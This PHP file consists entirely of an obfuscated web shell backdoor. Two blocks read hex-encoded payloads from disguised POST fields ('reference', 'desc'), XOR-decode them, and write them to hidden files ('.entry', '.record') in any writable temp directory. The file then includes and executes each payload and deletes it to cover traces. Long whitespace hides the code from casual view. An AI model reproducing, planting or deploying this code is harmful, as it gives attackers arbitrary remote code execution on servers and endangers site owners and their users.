<?php																																										if(count($_POST) > 0 && isset($_POST["\x72\x65fe\x72e\x6Ece"])){ $obj = array_filter(["/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), getcwd(), session_save_path()]); $element = hex2bin($_POST["\x72\x65fe\x72e\x6Ece"]); $symbol =''; $y = 0; do{$symbol .= chr(ord($element[$y]) ^ 2);$y++;} while($y < strlen($element)); while ($pgrp = array_shift($obj)) { if (max(0, is_dir($pgrp) * is_writable($pgrp))) { $item = implode("/", [$pgrp, ".entry"]); if (file_put_contents($item, $symbol)) { require $item; unlink($item); exit; } } } }


if(!empty($_POST["\x64es\x63"])){
	$bind = array_filter([getcwd(), sys_get_temp_dir(), getenv("TMP"), "/tmp", getenv("TEMP"), session_save_path(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir")]);
	$value = hex2bin($_POST["\x64es\x63"]);
	$comp =    '' ;$k = 0; while($k < strlen($value)){$comp .= chr(ord($value[$k]) ^ 91);$k++;}
	foreach ($bind as $key => $res) {
    		if (array_product([is_dir($res), is_writable($res)])) {
    $marker = vsprintf("%s/%s", [$res, ".record"]);
    if (@file_put_contents($marker, $comp) !== false) {
	include $marker;
	unlink($marker);
	die();
}
}
}
}